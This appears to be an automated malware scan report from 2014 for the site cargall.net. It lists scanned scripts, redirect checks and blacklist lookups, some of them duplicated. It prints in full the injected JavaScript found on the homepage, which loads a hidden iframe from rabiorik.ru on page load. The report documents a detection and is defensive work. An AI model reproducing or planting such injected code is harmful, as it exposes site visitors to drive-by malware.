Scanned pages/files
| Request | Server response | Status |
http://cargall.net/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Tue, 30 Sep 2014 11:23:38 GMT Location: http://www.cargall.net/ Server: nginx/1.6.2 Content-Length: 292 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.cargall.net/ | 200 OK Content-Length: 95451 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: rabiorik.ru function create_frame(a){var b=document.getElementById('p2ep44');if(typeof(b)!='undefined'&&b!=null){}else{var c=document.createElement('iframe');c.id="p2ep44";c.style.width="0px";c.style.height="0px";c.style.border="0px";c.frameBorder="0";c.style.display="none";c.setAttribute("frameBorder","0");document.body.appendChild(c);c.src=a;return true}}function qjsqtxx(){create_frame("http://rabiorik.ru/ackarbb.cgi?default")}try{if(window.attachEvent){window.attachEvent('onload',qjsqtxx)}else{if(window.onload){var curronload=window.onload;var newonload=function(){curronload();qjsqtxx()};window.onload=newonload}else{window.onload=qjsqtxx}}}catch(err){} Decoded script: function qjsqtxx() { create_frame("http://rabiorik.ru/ackarbb.cgi?default"); } | ||
http://www.cargall.net/wp-content/themes/cargall/js/jquery-1.7.2.min.js | 200 OK Content-Length: 94840 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/jquery.validate.min.js | 200 OK Content-Length: 21603 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/jquery.easing.min.js | 200 OK Content-Length: 7046 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/jquery-ui-1.8.18.custom.min.js | 200 OK Content-Length: 14134 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/jquery.ba-hashchange.min.js | 200 OK Content-Length: 1526 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/jquery.mousewheel.js | 200 OK Content-Length: 2401 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/cufon-yui.js | 200 OK Content-Length: 18207 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/Aller_400-Aller_700.font.js | 200 OK Content-Length: 300958 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/cufon-colors.js | 200 OK Content-Length: 1392 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/plugins/highslide/highslide-full.js | 200 OK Content-Length: 96192 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/plugins/highslide/highslide.config.js | 200 OK Content-Length: 2411 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/plugins/image-loaded/jquery.image-loaded.js | 200 OK Content-Length: 671 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/jquery.skitter.js | 200 OK Content-Length: 68804 Content-Type: application/javascript | clean |
http://www.cargall.net/wp-content/themes/cargall/js/jquery.aw-showcase.js | 200 OK Content-Length: 41686 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: cargall.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 30 Sep 2014 11:23:38 GMT
Location: http://www.cargall.net/
Server: nginx/1.6.2
Content-Length: 292
Content-Type: text/html; charset=iso-8859-1
...292 bytes of data.
GET / HTTP/1.1
Host: cargall.net
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Tue, 30 Sep 2014 11:23:38 GMT
Location: http://www.cargall.net/
Server: nginx/1.6.2
Content-Length: 292
Content-Type: text/html; charset=iso-8859-1
...292 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: cargall.net
Referer: http://www.google.com/search?q=cargall.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: cargall.net
Referer: http://www.google.com/search?q=cargall.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=cargall.net
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://cargall.net/
Result: cargall.net is not infected or malware details are not published yet.
Result: cargall.net is not infected or malware details are not published yet.